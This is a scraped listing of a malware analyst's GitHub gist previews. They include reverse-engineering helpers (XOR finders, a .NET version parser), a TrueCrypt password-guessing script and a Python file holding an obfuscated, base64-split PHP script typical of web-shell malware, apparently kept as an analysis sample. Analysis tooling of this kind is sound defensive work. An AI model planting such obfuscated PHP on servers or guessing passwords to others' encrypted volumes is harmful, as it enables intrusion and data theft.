This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
import os | |
def process_running(procname): | |
def find_pid(processname): | |
import win32com.client | |
for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
if proc.Name.upper() == processname.upper(): | |
return proc.Properties_('ProcessId') | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import subprocess | |
tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe" | |
tc_file = "E:\\test.tlc" | |
drive_letter = "P" | |
def leet_lookup(char): | |
list = {"a": ["a","A","@"], | |
"b": ["b", "B", "8"], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
from PyQt4.QtCore import * | |
from PyQt4.QtGui import * | |
import base64 | |
def main(): | |
app = QApplication(sys.argv) | |
w = MyWindow() | |
w.show() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
script = """ | |
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#@bbaskin | |
import os | |
import re | |
# Thanks to Andrew Havens of Cipher Tech for figuring out how to escape the paranthesis to work with | |
# both expandvars and regex | |
def generalize_vars_init(): | |
""" | |
Initialize a dictionary with the local system's environment variables. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def multibyte_xor(data, key): # Python 2 | |
from itertools import izip, cycle | |
return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command] | |
@="cmd.exe /k cd \"%L\"" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Automatically find XOR/SHL/SHR routines from an executable | |
# Uses IDAW (text IDA) | |
# @bbaskin - brian @ thebaskins.com | |
# While other, more powerful scripts like FindCrypt find known | |
# algorithms this is used to find custom encoding or modified | |
# encryption routines | |
""" | |
Script results: | |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def get_NET_version(data): | |
""" | |
Code to extract .NET compiled version. | |
typedef struct t_MetaData_Header { | |
DWORD Signature; // BSJB | |
WORD MajorVersion; | |
WORD MinorVersion; | |
DWORD Unknown1; | |
DWORD VersionSize; | |
PBYTE VersionString; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am Rurik on github. | |
* I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
* I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
To claim this, I am signing this object: |
OlderNewer